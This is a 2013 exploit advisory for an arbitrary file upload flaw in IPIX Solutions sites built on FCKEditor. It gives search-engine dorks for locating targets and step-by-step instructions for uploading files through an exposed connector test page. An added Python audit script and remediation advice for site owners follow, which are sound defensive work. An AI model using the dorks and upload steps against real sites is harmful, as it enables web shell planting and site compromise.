#Exploit Title : IPIX Solutions (FCKEditor) File Upload Vulnerability
#Author : DevilScreaM
#Date : 14/09/2013
#Category : Web Applications
#Vendor : http://ipixsolutions.com
#Dork : intext:Powered By Ipix Solutions
        intext:Powered By:IPIX SOLUTIONS
        intext:Website Design @ IPIX Solutions.
#Vulnerability : Arbitrary File Upload Vulnerability
#Tested On : Windows 7/XP , Ubuntu (Mozilla & Chrome)
#Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker

POC and Exploit

http://site-target/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
===================================================================================
1. At "Select the "File Uploader" to use", change from ASP to PHP
2. Select your file
3. Click "Send it to Server" and wait
4. Result: the upload is at http://site-target/userfiles/[YOUR_FILE.txt]
===================================================================================
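For site owners, the exposure described above can be checked directly on the server's file system. The following is an added example, not part of the original advisory: it walks a web root and reports a leftover connector test page, an enabled PHP connector, and script files sitting in `userfiles`. The `php/config.php` switch `$Config['Enabled']` comes from the stock FCKeditor 2.x layout and is assumed to apply to this deployment; the function names and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile

TEST_PAGES = {"uploadtest.html", "test.html"}   # stock FCKeditor 2.x connector test pages
SCRIPT_EXTS = {".php", ".phtml", ".asp", ".aspx", ".jsp", ".cfm"}
ENABLED_RE = re.compile(r"\$Config\[\s*['\"]Enabled['\"]\s*\]\s*=\s*true\b", re.I)

def connector_enabled(config_path):
    """True if a non-commented line sets $Config['Enabled'] = true."""
    with open(config_path, errors="replace") as fh:
        return any(ENABLED_RE.search(line) for line in fh
                   if not line.lstrip().startswith(("//", "#", "*")))

def audit_webroot(root):
    """Return sorted (finding, relative_path) tuples for one web root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        if rel.endswith("editor/filemanager/connectors"):
            findings += [("test-page-exposed", f"{rel}/{n}") for n in files if n in TEST_PAGES]
        elif rel.endswith("editor/filemanager/connectors/php") and "config.php" in files:
            if connector_enabled(os.path.join(dirpath, "config.php")):
                findings.append(("php-connector-enabled", f"{rel}/config.php"))
        elif rel == "userfiles" or rel.startswith("userfiles/"):
            findings += [("script-in-upload-dir", f"{rel}/{n}") for n in files
                         if os.path.splitext(n)[1].lower() in SCRIPT_EXTS]
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample layout mirroring the paths named in the advisory."""
    conn = os.path.join(root, "admin", "fckeditor", "editor", "filemanager", "connectors")
    os.makedirs(os.path.join(conn, "php"))
    os.makedirs(os.path.join(root, "userfiles"))
    samples = {
        os.path.join(conn, "uploadtest.html"): "<html></html>",
        os.path.join(conn, "php", "config.php"):
            "// $Config['Enabled'] = false ;\n$Config['Enabled'] = true ;\n",
        os.path.join(root, "userfiles", "note.txt"): "ok",
        os.path.join(root, "userfiles", "x.PHP"): "<?php ?>",
    }
    for path, body in samples.items():
        with open(path, "w") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for kind, path in audit_webroot(tmp):
            print(f"{kind:24} {path}")
```

Any finding is a reason to delete the test pages, set the connector switch to false unless the file manager is needed behind authentication, and stop the web server from executing scripts under `userfiles`.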